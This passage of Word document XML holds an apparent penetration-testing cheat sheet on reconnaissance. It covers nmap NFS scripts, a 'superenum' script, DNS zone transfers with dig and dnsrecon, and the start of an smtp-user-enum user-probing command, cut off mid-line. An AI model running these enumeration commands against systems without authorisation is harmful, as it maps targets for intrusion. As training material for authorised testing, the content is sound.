              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nfs-ls</w:t>
            </w:r>
            <w:r w:rsidR="004B3A3C" w:rsidRPr="004B3A3C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>nfs-statfs</w:t>
            </w:r>
            <w:r w:rsidR="004B3A3C" w:rsidRPr="004B3A3C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>nfs-showmount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C50256" w14:paraId="4EA9E0F3" w14:textId="77777777" w:rsidTr="00C50256">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6DE43CC2" w14:textId="628CFF68" w:rsidR="00C50256" w:rsidRDefault="00C50256" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00AF373A">
              <w:t>e</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67FBD6BC" w14:textId="049191F0" w:rsidR="00C50256" w:rsidRPr="00C706A1" w:rsidRDefault="00C706A1" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C706A1">
              <w:t>superenum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4369D8AB" w14:textId="78DF8F50" w:rsidR="00C50256" w:rsidRDefault="00C706A1" w:rsidP="00BE43BF">
            <w:r>
              <w:t>Once you have installed and enable permissions and created a file with at least one target ip address in, cd to the directory with the superenum file in, then, simply:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C706A1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00C706A1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C706A1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidRPr="00C706A1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>superenum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C706A1">
              <w:t>Then the script will ask you for the file in which is the target ip address, if you created a file in the directory we are currently in, you can simply type the name of the file, if it is located elsewhere then we need to type the realpath address of the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE43BF" w14:paraId="09AA9F44" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="713027DC" w14:textId="77777777" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5F762033" w14:textId="77777777" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51BE3957" w14:textId="77777777" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF" w:rsidP="000A77DA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62F867A4" w14:textId="77777777" w:rsidR="00652877" w:rsidRDefault="00652877"/>
    <w:p w14:paraId="77D7B3F6" w14:textId="77777777" w:rsidR="00652877" w:rsidRDefault="00652877">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE86F3C" w14:textId="568DD526" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="00652877">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="001F7E9E" w:rsidRPr="001F7E9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS </w:t>
      </w:r>
      <w:r w:rsidR="003C01E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>numeration)</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652877" w14:paraId="756DDF03" w14:textId="77777777" w:rsidTr="000A77DA">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79001B33" w14:textId="35C136AE" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="14205B88" w14:textId="694EF179" w:rsidR="00652877" w:rsidRPr="00EE328B" w:rsidRDefault="003C01E2" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>DNS Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38642861" w14:textId="37EEF8E1" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="00652877">
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF THERE IS ACCESS TO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>A DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SERVICE, OTHERWISE SKIP.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00652877">
              <w:t xml:space="preserve">This process </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">of DNS enumeration </w:t>
            </w:r>
            <w:r w:rsidRPr="00652877">
              <w:t>yields information such as DNS server names, hostnames, machine names, usernames, IP addresses, and aliases assigned within a target domain.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00652877">
              <w:t>DNS enumeration can be performed using the following techniques:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Zone transfer</w:t>
            </w:r>
            <w:r w:rsidR="00723EC8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CB58F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CB58F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00723EC8">
              <w:t>(check 54.b</w:t>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:t xml:space="preserve">, using dig or </w:t>
            </w:r>
            <w:r w:rsidR="0046092F">
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:t>, using nslookup</w:t>
            </w:r>
            <w:r w:rsidR="00723EC8">
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DNS cache snooping</w:t>
            </w:r>
            <w:r w:rsidR="00CB58F6">
              <w:tab/>
              <w:t>(check</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DNSSEC zone walking</w:t>
            </w:r>
            <w:r w:rsidR="00CB58F6">
              <w:tab/>
              <w:t>(chec</w:t>
            </w:r>
            <w:r w:rsidR="00130605">
              <w:t>k 54.c, using DNSRecon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00652877" w14:paraId="5C3651F4" w14:textId="77777777" w:rsidTr="000A77DA">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630E11D2" w14:textId="6093BEAE" w:rsidR="00652877" w:rsidRDefault="00723EC8" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.b</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2DCE9DDA" w14:textId="7B65EE3B" w:rsidR="00652877" w:rsidRPr="00EE328B" w:rsidRDefault="00652877" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dig</w:t>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="001F7E9E" w:rsidRPr="003C01E2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(dig is installed in Kali Linux by default)</w:t>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:br/>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:br/>
              <w:t>DNS zone transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C11DDEC" w14:textId="74D86346" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="00652877">
            <w:r>
              <w:t>DNS zone transfer is the process of transferring a copy of the DNS zone file from the primary DNS server to a secondary DNS server. In most cases, the DNS server maintains a spare or secondary server for redundancy, which holds all information stored in the main server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B4EE79" w14:textId="2C655BC2" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="00652877">
            <w:r>
              <w:t>If the DNS transfer setting is enabled on the target DNS server, it will give DNS information; if not, it will return an error saying it has failed or refuses the zone transfer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4428463D" w14:textId="77777777" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="00652877">
            <w:r>
              <w:t>Here, we will perform DNS enumeration through zone transfer by using the dig (Linux-based systems) and nslookup (Windows-based systems) tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8A71A2" w14:textId="580581A3" w:rsidR="00652877" w:rsidRDefault="00723EC8" w:rsidP="00652877">
            <w:r>
              <w:t>Let’s try to u</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:t>se</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> the dig command in Linux environments such as Kali</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00652877" w:rsidRPr="00652877">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00652877" w:rsidRPr="00652877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>ns</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00652877" w:rsidRPr="00652877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.TARGETDOMAIN.com</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00652877" w:rsidRPr="00652877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-ns</w:t>
            </w:r>
            <w:r w:rsidR="00652877">
              <w:tab/>
              <w:t>Name servers in results</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Look in the ANSWER SECTION for all the DNS name servers of the target domain. Then, use the DNS name servers in another command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00723EC8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00723EC8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="00723EC8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NameServer</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00723EC8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">www.TARGETDOMAIN.com </w:t>
            </w:r>
            <w:r w:rsidRPr="00723EC8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>axfr</w:t>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="001F7E9E" w:rsidRPr="001F7E9E">
              <w:t>If ‘Transfer failed’ message is received then zone transfers are not allowed for the target domain.</w:t>
            </w:r>
            <w:r w:rsidR="001F7E9E">
              <w:t xml:space="preserve"> Re-try this previous command on all different domains of the target organisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00652877" w14:paraId="63A901CB" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2AF2F261" w14:textId="6C6A0011" w:rsidR="00652877" w:rsidRDefault="00130605" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="45494CED" w14:textId="0E303052" w:rsidR="00652877" w:rsidRPr="00C706A1" w:rsidRDefault="00130605" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dnsrecon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28190A33" w14:textId="61F49725" w:rsidR="00652877" w:rsidRDefault="00130605" w:rsidP="000A77DA">
            <w:r w:rsidRPr="00130605">
              <w:t>DNSSEC zone walking is a DNS enumeration technique that is used to obtain the internal records of the target DNS server if the DNS zone is not properly configured. The enumerated zone information can assist you in building a host network map.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00130605">
              <w:t>Here, we will use the DNSRecon tool to perform DNS enumeration through DNSSEC zone walking.</w:t>
            </w:r>
            <w:r w:rsidR="00FA1118">
              <w:t xml:space="preserve"> Simply use:</w:t>
            </w:r>
            <w:r w:rsidR="00FA1118">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00FA1118">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FA1118" w:rsidRPr="00916CA0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">dnsrecon </w:t>
            </w:r>
            <w:r w:rsidR="00FA1118" w:rsidRPr="00916CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-d </w:t>
            </w:r>
            <w:r w:rsidR="00916CA0" w:rsidRPr="00916CA0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">www.TARGETDOMAIN.com </w:t>
            </w:r>
            <w:r w:rsidR="00916CA0" w:rsidRPr="00916CA0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00652877" w14:paraId="03D64EE5" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="65B6BC95" w14:textId="77777777" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2E6D994A" w14:textId="77777777" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D9E7AB5" w14:textId="77777777" w:rsidR="00652877" w:rsidRDefault="00652877" w:rsidP="000A77DA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="780C2E85" w14:textId="77777777" w:rsidR="00916CA0" w:rsidRDefault="00916CA0"/>
    <w:p w14:paraId="69F17FA5" w14:textId="77777777" w:rsidR="00916CA0" w:rsidRDefault="00916CA0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F5E325" w14:textId="20B747FC" w:rsidR="00916CA0" w:rsidRDefault="00916CA0" w:rsidP="00916CA0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port, Service and Web Page Scanning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C540C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smtp-user-enum (SMTP enumeration)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1028"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="00916CA0" w14:paraId="5637D53A" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5917C32E" w14:textId="49381B12" w:rsidR="00916CA0" w:rsidRDefault="00916CA0" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7FA79326" w14:textId="0EA1B6B2" w:rsidR="00916CA0" w:rsidRPr="00EE328B" w:rsidRDefault="00C540C2" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>smtp-user-enum</w:t>
            </w:r>
            <w:r w:rsidR="004E6CB7">
              <w:br/>
            </w:r>
            <w:r w:rsidR="004E6CB7" w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(smtp-user-enum is not installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E2B6261" w14:textId="77777777" w:rsidR="00916CA0" w:rsidRDefault="00E964B6" w:rsidP="00916CA0">
            <w:r>
              <w:t>Smtp-user-enum is a tool for enumeration OS level user accounts on Solaris via the SMTP service(sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. For example, try:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>smtp-user-enum</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-M</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">VRFY </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004E6CB7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">administrator </w:t>
